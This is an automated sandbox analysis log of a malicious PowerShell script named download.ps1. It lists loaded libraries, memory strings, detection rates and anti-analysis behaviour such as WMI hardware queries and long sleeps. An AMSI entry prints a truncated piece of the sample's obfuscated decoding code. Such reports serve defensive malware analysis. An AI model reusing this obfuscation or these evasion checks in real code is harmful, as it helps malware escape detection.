Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348B50FA0_2_00007FFD348B50FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348B8BFA0_2_00007FFD348B8BFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34982EF30_2_00007FFD34982EF3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3498241C0_2_00007FFD3498241C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD349863C30_2_00007FFD349863C3
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d'
Source: powershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: lement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="7w6CO02cEtStPa5V75PqCQ">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQ/rs\x3dACT90oE4VDuypTCPH8jtHQgPMB8KgoFScQ',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="7w6CO02cEtStPa5V75PqCQ">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3AB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4wX
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3AB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w'
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basejs:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qAX
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u=/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,dX
Source: powershell.exe, 00000000.00000002.2217128894.00000111E388F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if(a=="2"&&location.search.indexOf("&gbv=2")==-1){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div style="font-size:83%;min-height:3.5em"><br></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2024 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="7w6CO02cEtStPa5V75PqCQ">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script 
nonce="7w6CO02cEtStPa5V75PqCQ">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQ/rs\x3dACT90oE4VDuypTCPH8jtHQgPMB8KgoFScQ',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="7w6CO02cEtStPa5V75PqCQ">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.2256586697.00000111F2269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F2048000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F201C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F21C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F2381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E38AB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: else top.location='/doodles/';};})();</script><input value="AL9hbdgAAAAAZ20pmmnlffYb1xXpsADo1rFclZRRAGc7" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" align="left" nowrap="" width="25%"><a href="/advanced_search?hl=en&amp;authuser=0">Advanced search</a></td></tr></table><input id="gbv" name="gbv" type="hidden" value="1"><script nonce="7w6CO02cEtStPa5V75PqCQ">(function(){var a,b="1";if(document&&document.getElementById)if(typeof XMLHttpRequest!="undefined")b="2";else if(typeof ActiveXObject!="undefined"){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if(a=="2"&&location.search.indexOf("&gbv=2")==-1){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div style="font-size:83%;min-height:3.5em"><br></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2024 - <a 
href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="7w6CO02cEtStPa5V75PqCQ">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="7w6CO02cEtStPa5V75PqCQ">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQ/rs\x3dACT90oE4VDuypTCPH8jtHQgPMB8KgoFScQ',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="7w6CO02cEtStPa5V75PqCQ">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: classification engine Classification label: mal84.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6636:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fbqcurvk.5pm.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $nrgjt5lz4yhicsu.(([char[]]@((8949-(23768232/(10160-7484))),(-1767+1878),(295792/2641),(-366+487),(298-(1734-1520)),(106116/956)) -join ''))( $8rp61yw5vju9sxg ) $nrgjt5lz4yhicsu.(([char[]]@((2213-2146),(177120/1640),(840714/7574),(867905/7547),(980003/9703)) -join ''))()$mpcn9vr7q8td12h.((-join (@((8237-8170),(-1034+(2397-(-1404+(10043043/(-110+3887))))),(-3145+3256),(-178+293),(535401/(37038087/6987)))| ForEach-Object { [char]$_ })))()[byte[]] $ia65phg4rfbu2qz = $8rp61yw5vju9sxg.(([system.String]::new(@((-1816+1900),(-10010+10121),(542100/8340),(953040/8360),(-4493+4607),(-9116+9213),(20691/171)))))() $l452znyjpth30ve=$ia65phg4rfbu2qz return $l452znyjpth30ve}[System.Text.Encoding]::ascii.(([char[]]@((6103-(2087072/(1393342/4027))),(-4408+4509),(5001-(36427445/7457)),(-6108+6191),(1026136/(15441-6595)),(812478/(41913887/5881)),(187530/(5672-(11890-8004))),(3163-(460+2593)),(5522-(15969793/2947))) -join ''))((5dmopfzenxq8c3istrw67al9vku "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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: download.ps1 Virustotal: Detection: 11%
Source: download.ps1 ReversingLabs: Detection: 15%
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdatauser.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: mscorlib.pdba source: powershell.exe, 00000000.00000002.2216453453.00000111DFFF2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbdll source: powershell.exe, 00000000.00000002.2267521502.00000111FA313000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2267521502.00000111FA313000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbj source: powershell.exe, 00000000.00000002.2267521502.00000111FA369000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.2267521502.00000111FA369000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2264659089.00000111FA213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.2216453453.00000111DFFF2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdbw7Z source: powershell.exe, 00000000.00000002.2264659089.00000111FA213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2216453453.00000111DFFF2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2264659089.00000111FA213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2264659089.00000111FA213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbll source: powershell.exe, 00000000.00000002.2267521502.00000111FA313000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *on.pdb source: powershell.exe, 00000000.00000002.2264659089.00000111FA213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbf source: powershell.exe, 00000000.00000002.2264659089.00000111FA213000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD3479D2A5 pushad ; iretd 0_2_00007FFD3479D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD348B751D push ebx; iretd 0_2_00007FFD348B756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD348B0953 push E95AB8D0h; ret 0_2_00007FFD348B09C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD348B00BD pushad ; iretd 0_2_00007FFD348B00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD3498A938 push eax; retf 0_2_00007FFD3498A939
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD3498BCB8 push edx; iretd 0_2_00007FFD3498BCBB

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5384
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4525
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2488 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
